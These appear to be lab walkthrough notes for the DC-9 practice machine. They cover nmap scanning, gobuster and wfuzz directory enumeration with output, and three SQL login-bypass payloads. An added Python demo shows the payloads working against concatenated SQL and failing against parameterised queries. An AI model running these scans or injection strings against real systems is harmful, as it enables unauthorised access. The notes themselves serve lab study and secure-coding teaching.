DC-9
Scanning: nmap -sn 192.168.1.0/24 to identify live systems on the network,
then look for open ports (without service details at first)
export IP=192.168.221.209
nmap -p- -A $IP
nmap -p- -sC -sV -T4 -O -v $IP |tee nmap

Enum:
always start with HTTP before SSH
export URL=http://192.168.221.209/

gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL |tee gobuster
Nothing interesting here either: we only have the login fields on the manage page and the search field on the search page to play with!
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.209:80/FUZZ
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000015: 301 9 L 28 W 316 Ch "css"
000000004: 301 9 L 28 W 321 Ch "includes"
000004227: 403 9 L 28 W 280 Ch "server-status"
000004255: 200 42 L 79 W 917 Ch "http://192.168.190.209:80/"
000030014: 200 42 L 79 W 917 Ch "http://192.168.190.209:80/"

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.190.209:80/FUZZ
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 42 L 79 W 917 Ch "index.php"
000000002: 200 49 L 88 W 1091 Ch "search.php"
000000072: 200 0 L 0 W 0 Ch "config.php"
000000156: 302 0 L 0 W 0 Ch "logout.php"
000000379: 200 42 L 79 W 917 Ch "."
000000586: 200 54 L 86 W 1056 Ch "results.php"
000001031: 200 50 L 87 W 1210 Ch "manage.php"
000001204: 200 41 L 234 W 2961 Ch "display.php"
000001233: 302 0 L 0 W 0 Ch "welcome.php"
000001904: 302 0 L 0 W 0 Ch "session.php"

SQL Injection

https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
' or '1'='1
' or ''='
' or 1 or '
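To make clear why the three payloads above work against a login form and what stops them, here is an added example (not part of the original notes, and not DC-9's own PHP, which this page does not show). It assumes the login runs a query shaped like the one in vulnerable_login(); the user table and credentials are constructed demo data in an in-memory SQLite database. The same check written with bound parameters is shown beside it.

```python
import sqlite3

# Constructed demo data: one user in an in-memory SQLite database.
# Assumption (not from the page): the target's manage.php login builds its
# SQL the way vulnerable_login() does.
PAYLOADS = ["' or '1'='1", "' or ''='", "' or 1 or '"]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Naive login: user input is spliced straight into the SQL text.

    With password = "' or '1'='1" the statement becomes
        ... AND password = '' or '1'='1'
    so the OR clause is always true and a row is returned.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is only ever data,
    so quotes and OR clauses cannot change the query structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def bypass_results(payloads=PAYLOADS, username="nobody"):
    """Return {payload: (vulnerable_result, safe_result)} for a username
    that does not exist, so any True is a bypass, not a real login."""
    conn = make_db()
    return {p: (vulnerable_login(conn, username, p), safe_login(conn, username, p))
            for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, safe) in bypass_results().items():
        print(f"{payload!r:16} concatenated: {vuln}   parameterised: {safe}")
```

Running it shows every payload logging in through the concatenated query and none through the parameterised one; the real credentials still work through safe_login(). Prepared statements (PDO or mysqli with bound parameters in PHP) are the fix, and a WAF or input filter is at best a secondary layer.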